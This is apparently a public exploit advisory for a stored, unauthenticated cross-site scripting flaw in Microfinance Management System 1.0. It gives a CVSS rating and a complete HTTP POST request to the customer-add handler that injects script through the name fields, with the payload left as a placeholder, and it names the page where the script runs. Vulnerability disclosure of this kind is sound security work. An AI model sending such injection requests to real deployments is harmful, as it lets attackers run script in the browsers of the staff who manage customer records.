Microfinance Management System 1.0 Cross Site Scripting

`# Exploit Title: Microfinance Management System 1.0 - Cross-site scripting  
stored (unauthenticated)  
# Date: 23/03/2022  
# Exploit Author: Mr Empy  
# Software Link:  
https://www.sourcecodester.com/php/14822/microfinance-management-system.html  
# Version: 1.0  
# Tested on: Linux  
  
  
Title:  
================  
Microfinance Management System 1.0 - Cross-site scripting stored  
(unauthenticated)  
  
  
Summary:  
================  
Microfinance Management System version 1.0 is affected by the Cross-site  
Scripting vulnerability due to poor hygiene in certain parameters. The  
attacker could take advantage of this flaw to inject arbitrary javascript  
code to manipulate the victim's browser capabilities.  
  
  
Severity Level:  
================  
6.5 (Medium)  
CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:H/A:N  
  
  
Affected Product:  
================  
Microfinance Management System v1.0  
  
  
Steps to Reproduce:  
================  
  
1. Open a request repeater (like Burp Suite) and send this request:  
  
POST /mims/app/addcustomerHandler.php HTTP/1.1  
Host: target.com  
Content-Length: 310  
Cache-Control: max-age=0  
Upgrade-Insecure-Requests: 1  
Origin: http://target.com  
Content-Type: application/x-www-form-urlencoded  
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like  
Gecko) Chrome/95.0.4638.69 Safari/537.36  
Accept:  
text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9  
Referer: http://target.com/mims/addcustomer.php  
Accept-Encoding: gzip, deflate  
Accept-Language: pt-PT,pt;q=0.9,en-US;q=0.8,en;q=0.7  
Connection: close  
  
customer_number=335341988&customer_type=14465108&first_name=<XSS PAYLOAD  
HERE>&middle_name=<XSS PAYLOAD HERE>&surname=<XSS PAYLOAD  
HERE>&nationality=Tanzanian&date_of_birth=2000-01-01&gender=O&addcustomer=  
  
You can find your XSS payload in the /mims/managecustomer.php endpoint.  
`